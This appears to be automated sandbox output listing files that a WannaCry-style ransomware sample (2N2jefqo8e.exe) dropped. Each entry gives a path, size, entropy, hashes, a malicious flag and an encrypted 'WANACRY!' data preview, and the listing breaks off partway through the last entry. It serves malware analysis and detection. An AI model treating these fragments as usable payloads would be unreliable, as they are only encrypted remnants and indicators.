                                Preview:WANACRY!......)....?.>..z...K6/f'.IY.Xt.g...+.i.$.@8.#"\..D....B =...b+..f..CS.[^=.../W.-'.e.`.8..`.....E.X@u.....!qxPP...v.$....F.1m..fP..T......"..' -.qr..?g2.`8.P.(k9Z...:-_o..a..n.2U.`...7...?.R..!.s.O..T{..}B..,`...BC....e..#U...-.)..rOK..+(....DD.P.:............LHg%.0...........>....4.P..N.e.oNq...:.6.._..C.....+sl....@..^Y.J.d..h....Kh.5M.4.}.bP..B!............`.R.%..k.q2.(...K..z\.z|/...7.p..i.~..*..YF...+1X.\k{.......g.......$..w..V#N..o.u....?w.+1Nf..Q]..2.D.pgBMW[.J.+..Y..|...]s.6.Q.....g.........A.a.....>....W.99.....).{.P,Y.G.3[jw.Y.m........3.G.9t.....=2D..ST......rhE...C.Rw.Vj..y.......v>......@.7..[.$...NxH....Kt.t.=.....v.!a....A{.e5......r.....(....;.`..jx....R..Y.g.t.....p{V.;..?..Xh..<$.-..W,.V..-..I.5H..?D R;..u.'.S~h.e....s..h...qd.J.8x.rvYeys+/9....n(.......2.......G...:..A.....#.....ox....d..1*..T..NE.msg..%.a.N..%.Ef.........-.>mI.+.yb.#N.m}[......:...[ld...?.+A)Lu..t.(....V.._..F.........((....**.78:zU......S.J<M.$..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):227064
                                Entropy (8bit):7.999231559643118
                                Encrypted:true
                                SSDEEP:3072:WSYlNdXtAaEBvlFIZj3lO2V94sQFOwwTCnLVWTjkutnlGEzw8XV5Wz1SOXGEeWs/:WdXuBzGJQsQHnLQtlGpKV5YmP
                                MD5:040DEF7F2E02E0BA692E9817BDA476E6
                                SHA1:F701EEE53E361FBD9606E589A034859E48606299
                                SHA-256:7B4D767F21D1051B1798467E73F88CEFA10F8376848889F723C408B38709D801
                                SHA-512:F07ECC74BA571ABF128556777D22872E764E16BB8E86E1F04F6A90C3AD1D3F037663D090D272D2531C34D137F0EC0CCEDD0156D83006076F7755DAE090D450E4
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......!k}U..x.8....{.{B....0).+.......M@qi.... ....!7.h.oqE..........>.#...b,>....o.0.E%.......*<...OB...v5.*...o#...0.-.m.+.1.T3.-.G_.%7.J+.2R.l...P...`.....s......X...-..o....F./.o`._t+...C.#.3..Wlp.8..Q[.G....K<..1ef_..X..J.......+.y.>s.Q.`.5.B.......u.......~.]...S.@.."FH...Jo..i).HA..Md.c.d..].!......2Y......(..H...w..2.Cv.d...........S.....\h`R...V.......].C."......'...%..<.k.<O.TT.o.?W... Q..r...Gu......?:..D.v"9...2=.....($.. ...uni...Uw..shO.*.2.l.....Q...t[......4J.+.y..!2Q}.Un=..o..../.gIL.e$)..t.P|sUm.2. Lf..N.;.M.A..'....%........#!g.,.w.l.'X.a....e..p..DiR_....V.....`yp.z..?..M...d... ...../.././..+..x..3 ........Qg./9o1`..=..).......P.>.....7.!..}..".K7.g]j..<(..1ys~_W....Mm..B......(.dL..'I.t]!M9..8].^8...^K.. y..+.%....k0.r...L..W.+...).....i)P..v...L,...P..k...PO..^..C..6<.U.t.Y..c^1U.....*..AV..fb..y.^k..|...?...~&|..:9,...Tg'.04.P..c$8(......C.,d%..:..)..gU.-...jaW.tBB.D.r.4.`..J...J.]r... ...5...C.......|?b

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):53752
                                Entropy (8bit):7.996427760791523
                                Encrypted:true
                                SSDEEP:1536:NolrOnkcP0a94UigxECyMoPwo2L7xBGWtGUoOa:NoInkQ0a94UBlFoYL7xBvGUoOa
                                MD5:C3D8D45C59F92718948AC48CE1462847
                                SHA1:1C9E2AFD9C663596B9E4943D46C932779A14F9E2
                                SHA-256:A13D9CD068271FAED6F915C3A33CD0355679D90FDE0D2CEFF51B043B9C1D2D29
                                SHA-512:478EACABE6DD79F45E073AD13569F6914411811F4F66348C6A025396EAC6764DB686CA769F81C183BD3002B21041615B8A1BC83D765BD9EAABC4F58A79531F59
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....n...oA.R...EY.qk.v.bW...........0..o-....[.<.....QH.s!.........>O.yo...^...F..{...Q,p&....5.zU..Z.M......M3.......)....L...\n=.....f...U....#.....2/L.m.........&..!.OL. ".n..".......7.NL"l..=.{..+..*[.K.....l..M[.E..L.).~B1x.....j.3bS....P..y.tZ.h.......................+.RyYv.l.i.'.6.e`.6../w{0.l.\.DV..Nl....zN.cw).2c;.2l.-.N1.....\..4..S.&..q.i.x..W3v.%.*...#;..2].Mh....^.^.}].....r..|...#C..3...r*.0..<[......xy[#Jx.......,U.O.....@...T.S..Z4D..s"......\~K\eO.!..y..u.....[...S.<...&.....9...3K...j.N......j.8.i...g...o1.w..Z ..u.G.,...d.t.J............8.LcT.3.=..../.......+i...y.F.f.9o..&.a.....g....D.9..a.....X......Uo.E....6]..2.;^..qS..:.U......#..\*x4Q.X[...1..W[.z....w..V.+GF.2.c.V.i..l..Z.!aG.z.b..f8..i..bU..yX...m.&=2....0.yq5v.Z.\d\.;I.F..p..<CsJ6Y....W..fZ.4c.g..i.t.....4R...n...O.?.1H2.9.YrNq..(.....I.. Z....`Y6..lr...~4J5S.Z>_./2.}}m{.Zm?......D...F... ...kE...).%/.y.h..G..<....,d./\sL.<YYJk.....0.j.Z..q*C..Y..OqT|j.s.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_14[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8008
                                Entropy (8bit):7.978936479330439
                                Encrypted:false
                                SSDEEP:192:rcpj1mDlQEeAiOk2VnC0vkI6WLF1tSjCvo+v7xc8zh3h:rcpxMzxVnPdLF1tQwdcY
                                MD5:D5530D469E94DDC467FD6ACC992AAAC0
                                SHA1:8C4B2C6DAF2025C81EAC510DBE04A00A708C59AF
                                SHA-256:4AB86518B101DCCD16BB1149DC0582D2FE4540EF7F9FA633E0E7F69CD9E2C382
                                SHA-512:2C2994DA7D6B49CC21A6FF9ACC952ADD289155A4081CA21E274E24BC246DE9978A6F5D2352CDC57F95DA1BEAAD7F7343ED578DC917B6F6A328816BCA58F871A2
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....U^....?.....J,....O.S9....f..u.....A.=.O....ay..W..z....$....j.l......p9eJ.a...........b..~.5..\.VC. .l....0..p..$....34FD...2..<H.S}_..el.q..<..sY..Y...W..&i/.&..*u...N7.,2ge.d}o.i...L........s0.*...0..r.kg.C.x...&+..L.>.t..hc.34J..P...Ji.OQ............k....w...kub.Y..q.)..^.1..D!.+4.oJ`.........{...T..c.J.....4.....>.v.qD........n.WSD....`....43.6][|..[.5Ij.yz.\}.:..D...m..a..>z..99.@.L..n.;D.x8.lY.?A...1,7.55S....l%.B.2.rbi..@....Y....'].xn...7.d...6..U.%...1..,f..Q.....P.q......b.*........,m.E....6...;....b....Z..~d.R.K>.r.9h......\<.%3.C.-).$?o...(...n..U..,.:./.kx.i....my.T..M.].P.<..,...7...)..A.>...<....-..k.^...........].n.P.`..Z.....B;..4.....7..;jU.a.....D%.......t.....N.w.!*.O...J..".Hz{.J1....\.h......6.Qx+*X..L....,..&Y.Fw.u.t..[h..{...cm....0M.?.!.....x.fs..RgL....t.`..4..a..s..]X....V..h..c..7n...]y.L.......O....R..B..F .C4...7X6c..u...%..kc.y..O.....~.-.\..C?.......y..y^....:.W.$.k]....%,....8c$.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):123256
                                Entropy (8bit):7.9986258075867225
                                Encrypted:true
                                SSDEEP:3072:j4Ke2RHIRO9jv2HECyEZYauidFP3vY2rw8Td+3UaQnImlIWSG3:s92RHI+jv5sYa5dFPvTrRd+3UamlIy
                                MD5:0804D533853E52F3A2E72FF8C089FF36
                                SHA1:FBFCB66951D0C7D4FF3718BB2ABA99C3BC09F1C6
                                SHA-256:B01B97660E09FF896699C7A27A83FA7B5279A2650ADAC28CB0839614FC59D2E2
                                SHA-512:273006BBD3BA1A03BF9937DE3097A6B9153B7B05DB75D95D377DB7EC8D9E75014F004843E96671CEEC400305EA91F026623D372FA7A78E1C369765813D0D4B27
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....1z.`.H.Q.&n]."Ot...K...^&{u<.c........Dz....S...W.N..U.G.IK`&...T..s.....q...Q.......~..Z#.u..j....B.[B...9.@E..U9..........[-..+....(..4b...a.9....B.m...<..+.. D..J..B.......=.M.of...?...4.o.......7B)]}.O..;g...->|W.z.$.n..Q........PC.#b...".....Z..........z....d..8.7D.hW.Z>Idc.~...BH...K.0#.M.....,9._.....*..S..^.I..,........Yh....8....&.A2.........u.u.W...3+.......C\...#...W..,GM..eL....3e...?....U.i...r...a..;.G%.DR.B.HF.;.U15...^.o...."....'.l....Sm..;/%.........0.d....-....9_!.6b...?.G.....d.7=!.i...."..:'....0...t....FPF.|...P.B.^..%...D...b.P.G'(.....g..fd...9...N..a+}"..o........v(..G.....|I.<?...:N..RP.....Z>R.w...$v..G?._={Ow...I......V.].}.X..$r... .Q.....Z.....W..n00..I$..+C.Z..=,f..|MM.V.>g....N...x..Q\..>..+7.j4.....JR..@A.0.'#........".1/....tz@..3...x.g.?{.o.........98...l.{K...8&.tE..........@.....I8QXz...>.!Vl.\P...s..p.. .....eu2...}'..G..&........3..y..2.^.X....>$...W_c.........`.r.M..e..h.&.....G..&..]....

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):95112
                                Entropy (8bit):7.9979534591976025
                                Encrypted:true
                                SSDEEP:1536:a72mqrOcGJ57W3aEPcqItHyiJZ17Y74mCAQVB33KmBBlzibaMYbe03yhA2AdKB:a7VYJG77W3aYnItHtnY74mCAQVB/B/HQ
                                MD5:36A47190952AC79378DCEE472F09C764
                                SHA1:C016349124073D3133EB7C5BB284451051437225
                                SHA-256:DDAEE76866D3C58319DD8E77D2B241037CACE6248D5E2BAB8B467AC56B34715F
                                SHA-512:A917A4D67776CB862BCF1D48333FED379FB99940B210D7A78A5F498ABAE6185262AF3525E1427F041BA70F33B3E3F72FC1FB60513C73786835A874F68F3717BF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......rOX}d..T..K.A.&...*....v..........`..:...&.N_.JQ.>.Rn._P.p(.G.|..y.i..A.m.2.'=ZH.32...b....u.0c....,...n.y.>-6.s.....S,.,..........'.3.i.tW.:..G....:.....Gl..I...n..og.../_a.Z.Q)D......H...E<..m..k.i6.NX..b.,V....we.02.w&....;._..H|............gr.......TJ.1....d.+w.......a..J.ew.*..v...l..(.]...a..^n{.B...(..p..N.c.lL.....]....o...Nr....}....c... *&..........._...hd^.....DC8...`Z...J.6...6U$.<..HZ"....d........(.S.V..6..s.;.r7~....H.%+.q#..T.]..#.ju(.t.U...0.../.........X....!..p5.[...F.i....u..yc$.x.H....Q.5.b+.-q).P|C..l....o...c.'..d.]....6.%9..e.....6.6n.,1.[."...+~Z.G..9m..0.ZE......E..O......Y..J.u1..@..7.k..N.........H...a}06).b...H........u....A.L.vv...s.;78..<.FX.....t1;.F@..a>sSe3.\...n..%6.C,7...=.I.....0{(...o~k...U..V..@.`o...kM...WsX.BAr2.T..._.. .G....~[.F/A....~...>.O..,F.......ZI.`...d.O..y......v..K..6%....m\6..a6T.r....y......|1..8'.L#..1v.)...S..O.$..t.#..%.....(\I.0K..V....-...B.{o.F...../....|..M..&.o

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_17[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6872
                                Entropy (8bit):7.9692803217288954
                                Encrypted:false
                                SSDEEP:96:oYesNuSjf1z1qeNhetFiKlO8PboU4btAkXPt1vEiwcXbM8NaA5WYjEicx1PUpbXE:FeJCf15qe6tFVOkin/ttzMlFicxRibyR
                                MD5:5C47455F71FA3AD318554AD436DF7549
                                SHA1:9C2FE23E9D90FE3FB37D29B540A0E4F71D74B944
                                SHA-256:BB626EBA6709B60F7B162276F4E90883004041123516D583068E5608D8F07B75
                                SHA-512:27EDEA493F89476F85DC9563795A6F52F99873E116AE76B5834F17F448B50E6AC5337666C48C1693782E7360615236D914E975738790D4EB7D130D319CE0D6EC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!..../.h...G9.V.E....:..}7M..l.._.....k.v.^..8..%Y[)d3......Q...}...r...'Qb....._@...W.........1'...tj&~~.......aw...,..23.)'E....m4D...X>{.b...jrlY.RA...>@...0.&.R.<."..\....}........{e.-.:...2=T..)(.5...&..9..e`........edU.O.R.../BUh^.g...q..~.?A..............4....N...5..`.-.&..uS.....9.e.....G7;.....j.ES...k+..^X..b...;3$....~..|/ .&.D.V..~.K......v.B..y4...@\o..X..........1.F'..i.3..........c...E..2.i4.12.c1'.]..YB.<....e.8.b. ..D9`.....:..z..,^.H.8h.1...1%....^LVu.u.r#....U....Au)/x...`.......!....B.=F.#L......M..zq.....%+.Dg}....kh9...n7...XJ.+N`...........0....X....n...Z...dTO..<<.r.4fK... .......ry..&F..ZX^f)..[$..)...wi'.s.<....jAM.^2...U..d.C'.R....ot0...TGB...Y....p..5.....^...-xy...m...)~D..?Q..........Gl..x...T..+_.n..i..T...PLQ.....Z.Z.(..m/......Ii.,\e..F.w.....9....oh..3.>...5...g76......u..;.B<...wU@J..._....P.Sc=l.%.1......!...Oo..P&B.5;........'.Z.5..g..m...z..?......./..R..X...~e.;..V.....;..J.k)..?gxo...Z~g....

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):122040
                                Entropy (8bit):7.998424207686981
                                Encrypted:true
                                SSDEEP:3072:qWbhg24UMxFpe1qw6P9MPcxYKxKNAKT3JFDlFsVk:qymKMxHKaPxxWxJdP
                                MD5:6BA774B65C629551E5DD9C33E08C1EEA
                                SHA1:14403B578F13AB2914F1F8E4E74805C5344E5058
                                SHA-256:11BA652646E030BA916DE8BD353B0FADC8E9C9680E8E412E0431DA308D0FF8EC
                                SHA-512:F1F75CC5A7223598F69FB638022C9F694A89DEEBD397376471AF4F80B6A481F28480A033774B41F3DFB5D3BAC72DF1984150A65B179EFACE34594CCE6BBF8AE7
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!........%Wd.@br.).G...2....BxX.......em_........6... ......).9\....0k.....0&...cB*.u.....`..o..re.#.....u.3^+.=...^.#k...>.W.B/.i...j........$...o`.<W.`u+f..........,...!?.*>...g.s...+.jJyn....J.r..n..<&........k .K>.a....(z..S4..':....!%.....r.>3k.n............. .x.B..b..4..OV.F.jT/.I ..+g............O..Nq.<.b.8.....i.....u.....Og..I.^.k.g.iK...u.Y5G..$o.T...Z..............h.._w..%T...pd.K.KW..:C.z:..H.#...L.. .?...'....B...fp.{%....W.".%aU....2|.;$.r..1$...os...pU9P....Y)& .E.<..D.C.......A.m......h....dT.`..k.K..$.....A..cL....H.=.)./.y.U?q..G.FkW.l=.U_..f.A.(.M....4t.........B....8.P......w....o......[.7....r\...5PP...R%.....]...pf..a.[.dzB..J...U.......N.wl.yh.Xg8#..8..........|..z}..=..I9Q.%...k.S....m............:`.qf.K..Q..b...i......+.Vm.....a.H....<gs....$..8(.8<...R..4...I..jZ.B...0..G..ud.HO..zWJF...`.C#.k:E.......+6...C5@i.G..C.3..s.q.:.#4...O.OU.......o...f..F...7.E'....$+._.&..`Ks.;W..JEnm6.AF..l....8s...)S.!...P....ZC.L..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):121496
                                Entropy (8bit):7.998474973271479
                                Encrypted:true
                                SSDEEP:3072:ENgyjQRx6VeyxNyu97GOm0CwpXiL86zRdO6obWIxbBRH:3Z6Ou9tm0CwE865IxbHH
                                MD5:BCA4C596D8AEF892DD8895BBE21405D2
                                SHA1:A7CC24AB590A497ACA4C9B85356885125B66B791
                                SHA-256:3D6D98927C2CB06B44402BCBBDBBDC741E2895A648D50E1BE9C2DB8F0F21BD13
                                SHA-512:156685066677563AC911D1FE5D364148FBB398AFF69D977D4D046E29562EC80656DEECECA4F81420AB249F46C0D33377C8DF7C2C2549ECF0CC3D7BC1D1006940
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!..........!...s..7...~........f..Im..3O.....v.......Y'.X...;......g*.T....@.'..e..p./..VuL.]..WZZ.UM..[.:4.....p@...B.I!0.Qa..(d..Q.Tk+.SjI.C...X.7...|"...1....9U........*.jd4Sr.H..c9...i..Y~;.....#.@....<...#%e]]X..._..YLF...I...I...O...b._...................d....{..<#.Wfe.W^).b..#..'<...yD.......)w..<.]".I.x...\.\.?...e....]y^.X..F....7. S..J1U.>.IE.W]!C.E....w......`..7..6K.s.9......~..i...]4....E". .......h....H.\..1..1..4L.H...1XG..)C.7......{p........"..ZHU....<.T...c..wzA..AM..MP .Z.pIm0....En......g?.........n4..K4.*Op.%K.>$J.W..)..Q.<....e"*.|7-.59....e.s}........*n.O.Gm..(...Q.).C..Y..~.<.G.9T..~.P.3...*.m....7..r1..L9#.o.Y.............+......... A.=.}.......J|n.~.X..5.w{....Wx(?.l1.m\z......wC?N....5...$G.l.7...Js...E......_$....{d.W.3..Z...=..j.so!si..<...t..Y.....3m..+D...N.N...B.2j<NC:...sQ.t...Q..'..+....u...<....^.....E{.].HKJ.C8...........".-..rQ....Mk.9>.v.N..3b...{....r.7....l.g...#Z]x..0........stFu-...

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):65784
                                Entropy (8bit):7.997033311270933
                                Encrypted:true
                                SSDEEP:1536:lYwd/2rusyR5hcWWuCndWw4Od31dTrDe1KUzPtVVcFLFbRLeRDrI:eI/2mu0CdWwndDeoUxVVgJbd2c
                                MD5:E00C37C800AE82394A726806CB313CF9
                                SHA1:F689FF82A909F823A348C790AAEABC88A16A3605
                                SHA-256:BD0861F21DA8E71E0AE954F17067EF03FE7ADB84D9250A4B7FCD0DB3268B6937
                                SHA-512:D2BCEFDE2239582BDF3E67A2725E625305617D4F2C075919B6183A9A330350D6057C0AF9ED5CC9BF645B2F632F7BE3E832B4013E1DCB2F83AEADEB96F5193AAB
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........9y...h....>.$.3<1..J.k.I"59.c...K.V.:OG.....Pj....5(.*..)<N$.....!.9HyF...E.$..(....s...#..l.f.......P...wd./.I.Z6.X.z.C.._:.R.L=..x.....p0ya..A..o.&..:....":..-..Hs:..q?0mf...*..d$.<.>7.2jV.-..Z.V}..CO(%...+..v.<.E.../......./..HZ...P..C............)...42....-........0W@.....yRf...d.LMI..k...X3....,,co.ot,..Dy.UV.SJ..b(.v..Z....!.5D..#.}..n.p..=.h<.c.M_..}..Z4tZ.~.#/|-.Zs..#......?....z...h.....p....... A..}8....`P@p....);.....3:......J..ac...C..U.........G+.*..../`....f..R.}^/v...UT."=1.....:... m.XWo?V<...l.c..?H;L..`A.t.E......r.8...[.%i[.3.mQU..L....9....!...(...../.m.z..MG..6r.F...OJ.n......y..i......9{d.8Jb.C....,..F......X.......1...................$...,`.../.8.......T.....`...V...{.H..h.M.. .._g.....A..Y{U..Et......`.E;?.~...... y.n.z^e.en....L.......Bf.C......_.&%..^..E.=..D.P=M.4m..N...L...82.........[Ul.I$.'.H.o.l.*........83.g...w.......q.5K.F.i...Cdmk.M..]..........i.B.dP.@.....<."J.....A.f..]..$@...H...T.)O..:.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45800
                                Entropy (8bit):7.995902480623642
                                Encrypted:true
                                SSDEEP:768:rPLoNaRuP8pP1ePtpAEb5XVrIdZhcOUUQq71Dzgy36JusJ69gU2u9Wzm:rcNxKw0EdI7UvMWe6JZJ6WJu9Wy
                                MD5:D901C9AC2E794C4C59414FCFC2F6CF28
                                SHA1:88959F2966CC3C638D346F748B5BDC84BB8DA0B7
                                SHA-256:B31275BF3E09105102C389106055305D6A33C050AFBF2178ED698C2DBA4D8253
                                SHA-512:3009EAEAF3F3D2CC8EE5F717BBEAB3EC210A11F505916E2B96E82DF8D78E800AA916BE4A41D944A48CD89680ED268867EACC1FB38701C78855EC59408DBA001F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....N&....o...x ..oD..[....yG.S..e..'.........[.V....9J.}{.../.;.M.L.2.,k.....-......V..g.r..E..'5.`.3......L.o....`[Q.i.n.a.# ...gr.....lCB....'......b$mS.f.5.{.[.o.2........6D....d......}`..-...j..).`b.7..U..q.Al.b..r........O.t..p..#..2....5..6?.............6....}\i.Vo.2..{Y?.!6uy.G..-....q..n.J......?T.....c$..\.m..?...!...(....L...*w.C!rA/B%.C.yg[.io../_.u&].u..=........5y8....(..m.0 i.P[...=2dg.....p"o.Sz.....]..=..*.U..j.q....s....e.......Eu..Y...x.K..D6..x......7s..]....m.of..=Z|+...u.u `7.O.k..3......Z.}.....K.0....FS..P...l{.....c.G*.Z.;......q...af..J..[.xz..........>S8....L..m...l.`...?e.\..C.>%...r.&...GhCB..I.~.....()c..i.g..k..4{....88..[".N..u..."..;8...."...)..*..y:...Y....v..N...$_..5...+2fI.-5....ru.7. .Q...[....?....n9I..V...-V.f.2YVL..q......[.....CY... .].o...q..}6.....5~/*Y.........>..mF.r.k....o..o..Z.)...W..1.d.n.q..u..T..q#....v...Q_.2...}B.1.{..M|...D4..`..6..Wm5.....;..Mjw8*...B.&....f..~....E.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):202536
                                Entropy (8bit):7.999033851806259
                                Encrypted:true
                                SSDEEP:6144:i/liHcaxCcz2GEl9YcU3wHHJAcNYI5lmSIA4:20cmC0c3npA2xzq
                                MD5:C43E894352B8B8BF96E384B64D3E3C10
                                SHA1:8CC3470DDF9DA8911D96C4DA6A154D5047E0406A
                                SHA-256:99C42BFC8C2A05A41417191376B2A3A2116B98C9887EF23BCBCF3011CB9A0308
                                SHA-512:89F6EACC9E92B7AC2FC226B36633DC222CBE3ABAA883E5F447E8581D7C9A7CF10983D85DA862B4505DD2BDAD4830CE37C905F18A57EBA6241DAA4CE758C962B8
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....qT.:7.Y..=....b.~p9.!.#..~.a\v...0.~...1...f>....y.\...8<...d..~#..'r..D6.(:=.}.....x.?../.s....2e..#yQ....7.:.....;.qF51...f."7.a..9n..3n...9...w.r...*.s3K....m....N(#1.2.3.Q..-.t....f(.pT\...%.._..........E...........;s.;....f1..d....PB.T....{ ............)tv.@..2H.X.....5..[?G.A...]..Y..+=...UM..?4.U..s...s.^.]......MbW0...#..W.u.T..>~..|g......&1........d.`4.j....r.s9.....(.XuA.E#.6.q.lt.O.{.$2.q...4......J...K.!.....G.*eS'....J..U..Tw^..R....t!\..\.K....7F..g.H:.;=...R.._..a4|..$2.:.K...........R...O.....m.F......,-8?|...g.L....S&]...... .7vI^.@...=..<..v..\.A...e._._F....H.?.L.^..........H>....S.f..Q.3..._W...[..@.o....6.....g.G....%.TRP.R.)...I..1...@./2Y-q..9....+x=..rwD.-......d ...j.p..H......Z\^..}!...n..P-y.:.i'...z..D...l..%.......W..j..o...<.$..F.Xc.....V...x..v..^...i7r....K.5...."-.v.yv.xXK%..?..V....}....u.. g..R<.HS.[<...7.2....".....Yfk...c.ee...na...6\..@....N..^1.D,y..|`.).""..F.....|.....Q.9..:....

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_23[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16200
                                Entropy (8bit):7.98716465787195
                                Encrypted:false
                                SSDEEP:384:lhmyBMd34sPfz3FY8XiYErHBBTJ0zhBj6VxIKAbQK:lFBMdosPzFBXrI1yXj6zIKs1
                                MD5:FF73082314F9E6DCD7751FD87B4B042F
                                SHA1:830D54B7F745A6659019A500C9398F4724B9198E
                                SHA-256:8CF438E0B7B73D4062BA2320DF33F529ABCCA4BC545F203878E1751FFEF00FFF
                                SHA-512:A367279D1B81BBDE6CDF0868AF860CF526FBFC933634E36815CFE83871A2E77968A12E2953BFA9C232C8B732B7A7A32BC4967C27CCFFDE435E982E2C3B0E85C7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....`Rv.....T...e.(M....6*8*..^.r.....:.....q..N$tJ.q...ZEL$`..n....x..F.>...w..7.ja..t|.g._.z..Y.).h8..w...y.k.......rw....(D.P.*B.=R.lx.....1.`_A_....*0...JzO...Y.,..q9v.....qd.X2..c...*... ...bj..,..I.9....] .g.6\.^o.|{71!..+0.y6.h+V!.._V..y....+>.......i`0.g.@H.|PYj..7.._.....&.....W..!..8L.a.~{c.%S..]..=J........N...'^..... .?..C.....31f7...u.o[...K.9.}=.o.?.....6..Y.e...,..q04f..[vZ...N.e.....6fN..$!,i..s.....w7?...lxa7.....`.TEq1.G.$Y....G`.....V=..../.-v...V...%9...2...1.9G/.~.K..^...d..+.]8..0.L..h.sA.B.5...X.........V...[8...R...........c...x..+..........A*.Cb.BoKH....v..p.3...D..8..?...4.JD"r..W..J.....(z.Z..L;f..IL..T..$.x.e..[.J..f.",t%h.....<....kJ.V.l.l.y.!{s........+>i].!...i@..SP....X:.8.%..5.j.=......+. ..p._..x{...|Q..A..leq..X'.0..y1.8].Gj.....o5a....6..Y.i...pF..:.../ .^.U.(.yT.m.A;.L.h..}=.Y....z..j&..53....5y.....n.......i.hi.(DO...Rg..S..A.[..P...&....a..M)..w.&..#n......(@..> db.)r~A..n...8 =}..o....F

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):49160
                                Entropy (8bit):7.995621412312451
                                Encrypted:true
                                SSDEEP:768:enBd+w8gAVri36ckB2KFMtvW5fzBh8pKy8o8vrEMupBgS8/4QcGgrUbHxElZHVC0:ebJPAO6v/a1WJdhGDK4ryBcdWGzcpy
                                MD5:56B635FDADD32E72CE2E08AA60FF3AF4
                                SHA1:390A19B78ED2738E2AC4725C111590A6DA0A2B9C
                                SHA-256:16121E77CEEB1B0C4C16E559CC6D284047577E35F91FC6E073036C143C379D49
